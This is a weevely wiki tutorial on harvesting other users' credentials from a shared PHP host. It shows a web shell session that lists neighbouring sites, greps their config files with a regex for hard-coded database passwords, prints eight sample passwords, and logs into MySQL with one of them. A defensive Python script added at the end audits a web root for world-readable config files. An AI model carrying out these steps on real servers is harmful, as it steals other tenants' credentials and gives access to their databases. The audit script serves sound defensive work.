Harvest other users' credentials

epinna edited this page Sep 20, 2014 · 1 revision

This tutorial shows how to harvest other users' credentials on a shared hosting server that does not allow shell command execution.

Configuration

  • Example PHP configuration: disable_functions = system, proc_open, popen, passthru, shell_exec, exec, python_eval, perl_system
  • Used modules: file_grep (grep)

Session

Find the folder containing the other users' web folders.

$ ./weevely.py http://target/agent.php mypassword

[+] weevely 3.0

[+] Target:	target
[+] Session:	_weevely/sessions/target/agent_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> ls
.
..
members
www-data@target:/var/www PHP> cd members
www-data@target:/var/www/members PHP> ls
.
..
alefst
anssot
latrwo
leempt
martol
natsta
rogjas
rotozy
tstanc
virots
yynost
www-data@target:/var/www/members PHP>

Now run the grep command (an alias for the file_grep module) with a raw regexp to find hard-coded passwords stored in other users' PHP scripts. The regular expression requires that no comment character (*, / or #) appears before the match (^[^*/#]*), so commented-out lines are skipped, and matches the word pass optionally followed by any of the letters w, o, r, d (passw?o?r?d?).

www-data@target:/var/www/members PHP> grep . '^[^*/#]*passw?o?r?d?'
./virots/config.php:$CFG->dbpass    = 'FFFklasdhas()asdjj';   // your database password
./anssot/moodle/config.php:$CFG->dbpass    = 'kasdhBSAUIGS77&';   // your database password
./leempt/wp/wp-config.php:define('DB_PASSWORD', 'AShasjdh177!@');
./alefst/wordpress/wp-config.php:define('DB_PASSWORD', 'ajhfaifh123!');
./martol/wordpress/wp-config.php:define('DB_PASSWORD', 'monkeydust1234');
./yynost/sites/default/settings.php:    'password' => 'XXyyynotsgoghia(XX',
./martol/drupal-7.x/sites/default/settings.php:    'password' => 'jhj@&&hgdas98k',
./natsta/drupal/sites/default/settings.php:    'password' => '99copacabana',
www-data@target:/var/www/members PHP> 

We found 8 credentials in one shot. We can also grep for statements that connect to MySQL.

www-data@target:/var/www/members PHP> grep . 'mysql_conn'
./rotozy/joosep-lineon/db.php:$g_link = mysql_connect( '10.4.4.24', 'rotozy', 'rotozy123') or die();
www-data@target:/var/www/members PHP>

Let's test the last one with the sql_console module.

www-data@target:/var/www/members PHP> :sql_console -user rotozy -passwd rotozy123 -host 10.4.4.7
rotozy@server7 SQL> SELECT USER();
+----------------+
| rotozy@server7 |
+----------------+
rotozy@server7 SQL> 

Gotcha.
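The session above works only because the other users' configuration files are readable by the account the agent runs as. The following script is an added example, not part of the weevely project or this page: it audits a shared web root for configuration files that other local users can read. The list of config file names, the directory layout it constructs and the shared-group option are assumptions.

```python
#!/usr/bin/env python3
"""Audit a shared web root for configuration files readable by other local users.

Added example (not from the weevely wiki). File names, layout and the
shared-group option are assumptions chosen to mirror the walkthrough above.
"""
from __future__ import annotations
import os
import stat
import tempfile
from pathlib import Path

# Files that commonly embed database credentials on shared hosts (assumed list).
CONFIG_NAMES = {"config.php", "wp-config.php", "settings.php", "db.php"}


def readable_by_others(path: Path, treat_group_as_shared: bool = False) -> bool:
    """True if the mode grants read to 'other' (o+r). On hosts where every site
    runs under one group (e.g. www-data), group read (g+r) is just as exposed."""
    mode = path.stat().st_mode
    mask = stat.S_IROTH | (stat.S_IRGRP if treat_group_as_shared else 0)
    return bool(mode & mask)


def audit_web_root(root: Path, treat_group_as_shared: bool = False) -> list[str]:
    """Return root-relative paths of config files that neighbouring users can read."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name in CONFIG_NAMES:
                p = Path(dirpath) / name
                if readable_by_others(p, treat_group_as_shared):
                    findings.append(str(p.relative_to(root)))
    return sorted(findings)


def build_demo_root() -> Path:
    """Construct a throwaway layout like /var/www/members: one exposed, one locked down."""
    root = Path(tempfile.mkdtemp(prefix="members_"))
    exposed = root / "virots" / "config.php"
    locked = root / "leempt" / "wp" / "wp-config.php"
    for f in (exposed, locked):
        f.parent.mkdir(parents=True)
        f.write_text("<?php // constructed placeholder, contains no real secret\n")
    exposed.chmod(0o644)  # typical default: any local account can read it
    locked.chmod(0o640)   # owner and group only
    return root


if __name__ == "__main__":
    for hit in audit_web_root(build_demo_root()):
        print(f"world-readable config: {hit}")  # → virots/config.php
```

Run it against a real web root (for example /var/www/members) as root; every reported file should get its mode tightened to 0o600 or 0o640 with a per-site group.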